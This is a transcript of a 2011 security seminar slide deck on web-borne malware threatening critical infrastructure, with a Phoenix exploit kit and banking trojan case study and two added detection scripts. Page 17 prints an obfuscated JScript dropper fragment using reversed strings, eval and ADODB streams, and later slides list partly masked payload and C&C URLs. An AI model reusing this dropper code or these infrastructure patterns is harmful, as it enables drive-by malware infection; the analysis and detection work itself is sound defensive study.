Protect critical infrastructure by Patrick de Jong

Protecting your critical infrastructure against web threats

Description: Seminar by Patrick de Jong during Infosecurity.be 2011

Transcript of Protect critical infrastructure by Patrick de Jong

Page 1: Protect critical infrastructure by Patrick de Jong

Protecting your critical infrastructure

against web threats

Page 2: Protect critical infrastructure by Patrick de Jong

Agenda:

• Critical infrastructure / web threats relation

• What are we facing (some statistics) and why

• Spreading the malware

• How do ‘they’ stay undetected?

• What harm can ‘they’ do?

• An example (Phoenix + Banker trojan)

• The message of the photo (opening slide)

Page 3: Protect critical infrastructure by Patrick de Jong

Critical infrastructure and web threats?

Digitized (remote) control based on standard OS like Windows or Linux, using standard Ethernet and TCP/IP: ‘everything’ got connected.

Previously: proprietary boxes with push buttons and switches, without any networking/connectivity (later with proprietary OS and networks).

Page 4: Protect critical infrastructure by Patrick de Jong

Critical infrastructure – Web threats

Page 5: Protect critical infrastructure by Patrick de Jong

Web-based threats: some statistics (what are we facing)

• 92% of new threats come from the Web

• 671% increase in Web malware* over 2008

• 79.9% of Web malware comes from legitimate sites**

* AV-test currently (01-2011) counted 50 million samples

** Source: Websense

Page 6: Protect critical infrastructure by Patrick de Jong

Some statistics (what are we facing): the Web 2.0 landscape

[Figure: Web 2.0 landscape with the categories Social Networking, Enterprise SaaS, Collaboration Tools, Client Applications, Social Media, Media Sharing, Interactive Sharing and Mass Comms]

• Under 40%: current AV catch rates*

• 52%: malware dead within 24 hours**

• 10 billion: world-wide blended threat emails per day

* Source: M86 Security Labs

** Source: Panda Labs

Page 7: Protect critical infrastructure by Patrick de Jong

Why? Driven by money. Just as professional as commercial software

Page 8: Protect critical infrastructure by Patrick de Jong

Why? Driven by money. Joint venture toolkits

Page 9: Protect critical infrastructure by Patrick de Jong

Why? Driven by money. Data selling

Page 10: Protect critical infrastructure by Patrick de Jong

Why? Mostly driven by money. Buying & Selling ‘victims’

Page 11: Protect critical infrastructure by Patrick de Jong

Spreading the malware: email spam and malicious websites

Page 12: Protect critical infrastructure by Patrick de Jong

Spreading the malware: malware distribution via legitimate websites (stolen FTP or hack)

Page 13: Protect critical infrastructure by Patrick de Jong

Spreading the malware: malware distribution via legitimate websites (stolen FTP or hack)

• Attacker benefits from someone else’s traffic and reputation

• Designed to defeat URL filtering & reputation software

• Most malware is now spread via compromised legitimate sites

Page 14: Protect critical infrastructure by Patrick de Jong

How ‘they’ stay undetected

Page 15: Protect critical infrastructure by Patrick de Jong

How they stay undetected: evasive techniques

Page 16: Protect critical infrastructure by Patrick de Jong

How they stay undetected: evasive techniques behind the scenes

Page 17: Protect critical infrastructure by Patrick de Jong

How they stay undetected: code obfuscation

// Every string literal is stored reversed; RV() restores it and RE() passes the result to eval().
var fname = "C:\\mssync20.exe";
var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth");
RE("");
var _r = RE(";)'tcejbo'(tnemelEetaerc.tnemucod");
RE(";)'r_','di'(etubirttAtes.r_");
RE(";)'63E92CF40C00-A389-0D11-3A56-655C69DB:dislc','dissalc'(etubirttAtes.r_");
var is_ok = 0;
try
{
  var _s = RE(";)'','maerts.bdoda'(tcejbOetaerC.r_");
  is_ok = 1;
}
catch(e){}
if (is_ok != 1)
{
  try
  {
    var _s = RE(";)'maerts.bdoda'(tcejbOXevitcA wen");
    is_ok = 1;
  }
  catch(e){}
}
function RE(s) { return eval(RV(s)); }
// Reverses a string one character at a time.
function RV(s)
{
  var rev = "";
  for (var i = 0; i < s.length; i++)
  {
    rev = s.charAt(i) + rev;
  }
  return rev;
}

Page 18: Protect critical infrastructure by Patrick de Jong

How they stay undetected: code obfuscation

Reversed malicious code – undetected! ‘Actual’ malicious code – detected (7 out of 31)
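An analyst can undo this string-reversal obfuscation without executing the script. The following is an added example (my code, not from the talk): it statically locates the RE()/RV() call sites, reverses each literal, and flags decoded strings that reference ActiveX or ADODB stream objects. The sample script is constructed in the style of the slide; the function names are my own.

```javascript
// Static deobfuscation of the reversed-string trick shown on the slide.
// The dropper stores every string backwards and restores it at runtime
// with RV() before handing it to eval() via RE(). We do the same
// transformation on the source text, minus the eval().

// Constructed sample in the style of the slide (hypothetical input).
const SAMPLE_SCRIPT = `
var _r = RE(";)'tcejbo'(tnemelEetaerc.tnemucod");
RE(";)'r_','di'(etubirttAtes.r_");
var _s = RE(";)'maerts.bdoda'(tcejbOXevitcA wen");
function RE(s) { return eval(RV(s)); }
`;

// Same reversal the malware performs, as a pure function.
function reverseString(s) {
  return s.split("").reverse().join("");
}

// Find every double-quoted literal passed to RE(...) or RV(...) and
// return [{ call, encoded, decoded }, ...] in source order.
function decodeReversedCalls(src) {
  const re = /\b(RE|RV)\(\s*"((?:[^"\\]|\\.)*)"\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(src)) !== null) {
    out.push({ call: m[1], encoded: m[2], decoded: reverseString(m[2]) });
  }
  return out;
}

// API names (all visible on the slide) worth flagging when they show
// up in decoded text: they indicate file-dropping via ActiveX/ADODB.
const SUSPICIOUS_APIS = ["ActiveXObject", "adodb.stream", "clsid:"];

function flagIndicators(decodedStrings) {
  const hits = new Set();
  for (const text of decodedStrings) {
    for (const api of SUSPICIOUS_APIS) {
      if (text.toLowerCase().includes(api.toLowerCase())) hits.add(api);
    }
  }
  return [...hits].sort();
}

// Run over the constructed sample and print what would have been eval'd.
const decoded = decodeReversedCalls(SAMPLE_SCRIPT);
for (const d of decoded) console.log(`${d.call}: ${d.decoded}`);
console.log("indicators:", flagIndicators(decoded.map((d) => d.decoded)));
```

Run the same function over a script captured from a compromised site to see the plaintext calls before any AV signature is needed.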

Page 19: Protect critical infrastructure by Patrick de Jong

How they stay undetected: dynamic code obfuscation

Page 20: Protect critical infrastructure by Patrick de Jong

How they stay undetected: dynamic code obfuscation

Page 21: Protect critical infrastructure by Patrick de Jong

How they stay undetected: private exploit encryption

NeoSploit infection process:

1. … <malicious IFRAME> …

2. Generating obfuscated JS

3. Generating a key and sending it to the server

4. Using the key to generate an encrypted script that is sent back to the client

5. The browser opens the encrypted script with the key and executes the JS code

Page 22: Protect critical infrastructure by Patrick de Jong

Toolkits/Trojans/C&C: what can they do with it

Page 23: Protect critical infrastructure by Patrick de Jong

Toolkits/Trojans/C&C: what can they do with it

Page 24: Protect critical infrastructure by Patrick de Jong

Example: banking trojan – money mules

Page 25: Protect critical infrastructure by Patrick de Jong

Example: banking trojan

Using stolen FTP accounts, the cyber gang managed to inject an IFRAME that leads to the Phoenix Exploit Kit on thousands of legitimate websites.

Page 26: Protect critical infrastructure by Patrick de Jong

Example: banking trojan

The user accesses a compromised website. The website content contains a redirection to the Phoenix Exploit Kit.

The user is redirected to the Phoenix Exploit Kit 2.3: http://fan******.net/.ph/5

The user’s PC is exploited and the payload is downloaded successfully.

Page 27: Protect critical infrastructure by Patrick de Jong

Example: banking trojan

The malware downloads a configuration file from: hxxp://uste*****.com.tr/Scripts/rd.bin

This specific configuration file contains injection orders that will be used when the user accesses the bank.

Page 28: Protect critical infrastructure by Patrick de Jong

Example: banking trojan

Before the Trojan accesses the Command & Control server, it verifies that the user’s PC is connected to the internet: http://google.com/webhp

After a successful connection test, the bot reports the new installation to the C&C server at: hxxp://195.***.**.147:3128/data/set.php

The gang doesn’t want to reveal the main C&C to the world and uses the Exploit Kit server as a proxy to the main C&C server.
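The connectivity probe followed by a check-in to a bare-IP server on port 3128 gives a simple proxy-log detection. As an added example (not from the talk), the following flags any client whose request to google.com/webhp is followed within a short window by a request to an IP-literal host on a non-standard port. The log lines, the 10.0.0.x clients and the 203.0.113.147 address are constructed for this example.

```javascript
// Proxy-log detection for the "connectivity test, then C&C check-in"
// sequence described on the slide. Constructed sample lines:
// "<ISO timestamp> <client> <method> <url> <status>".
const PROXY_LOG = [
  "2011-03-01T10:00:01Z 10.0.0.12 GET http://google.com/webhp 200",
  "2011-03-01T10:00:03Z 10.0.0.12 POST http://203.0.113.147:3128/data/set.php 200",
  "2011-03-01T10:05:00Z 10.0.0.33 GET http://google.com/webhp 200",
  "2011-03-01T10:07:30Z 10.0.0.33 GET http://www.example.com/news 200",
  "2011-03-01T11:00:00Z 10.0.0.12 GET http://203.0.113.147:3128/data/set.php 200",
];

// Parse one log line into the fields the detector needs.
function parseLine(line) {
  const [ts, client, method, url] = line.split(" ");
  const u = new URL(url);
  return { time: Date.parse(ts), client, method,
           host: u.hostname, port: u.port, path: u.pathname };
}

// Dotted-quad host instead of a DNS name.
function isIpLiteral(host) {
  return /^\d{1,3}(\.\d{1,3}){3}$/.test(host);
}

// Return one hit per request that (a) goes to an IP-literal host on a
// port other than 80/443 and (b) follows that client's last probe to
// google.com/webhp within windowMs. The last line of the sample is
// outside the window and therefore not reported.
function findCheckinPattern(lines, windowMs = 60000) {
  const lastProbe = new Map(); // client -> time of most recent probe
  const hits = [];
  for (const line of lines) {
    const ev = parseLine(line);
    if (ev.host === "google.com" && ev.path === "/webhp") {
      lastProbe.set(ev.client, ev.time);
      continue;
    }
    const probe = lastProbe.get(ev.client);
    const oddPort = ev.port !== "" && ev.port !== "80" && ev.port !== "443";
    if (probe !== undefined && ev.time - probe <= windowMs &&
        isIpLiteral(ev.host) && oddPort) {
      hits.push({ client: ev.client, beacon: `${ev.host}:${ev.port}${ev.path}` });
    }
  }
  return hits;
}

console.log(findCheckinPattern(PROXY_LOG));
```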

Page 29: Protect critical infrastructure by Patrick de Jong

Example: banking trojan

Besides the Trojan banker, the server sends the user another malware: fake AV. The gang operates in multiple vectors; using social engineering it tries to convince the user to buy fake AV.

Page 30: Protect critical infrastructure by Patrick de Jong

Example: banking trojan

The Trojan adds a script (on the client side) to every page in the website. Of course the script is not located on the server, and the user is redirected to the C&C to download it: hxxp://cheap********card.info/brap/bscript.js

The Trojan holds until the user accesses the bank.

Page 31: Protect critical infrastructure by Patrick de Jong

Example: banking trojan

From that point the Trojan supervises all user activity with the bank.

The moment the user tries to commit a transaction, the bot communicates with the C&C and receives full information about the new transaction that the bot intends to commit.

The bot replaces the details in the ‘transaction submit form’ and sends it to the server.

Page 32: Protect critical infrastructure by Patrick de Jong

Example: banking trojan

An example of a successful transaction generated by the Trojan to the money mule account.

Page 33: Protect critical infrastructure by Patrick de Jong

Web-based vulnerability: The (mobile) user

Page 34: Protect critical infrastructure by Patrick de Jong

Web-based vulnerability: The (mobile) user

• Roams between various ISPs:

– Wi-Fi at airport and hotel

– Home office

– Other

• No web security policy protection when off the corporate networks

• Readily infected by compromised legitimate sites

• Reconnects to corporate networks after trips

• Brings potential malware back into the organisation’s network

Page 35: Protect critical infrastructure by Patrick de Jong

The photo

Page 36: Protect critical infrastructure by Patrick de Jong

1. Evading dubious sites is key to keeping malware out?

2. Websites with a good reputation won’t infect you?

3. As long as your AV is updated there is nothing to worry about?

4. Protecting the end-user workstation is very important when protecting your critical security infrastructure?

Patrick de Jong

Sales Engineer Northern Europe

Phone: +31 33 454 3533

Mobile: +31 6 1373 2964

Email: [email protected]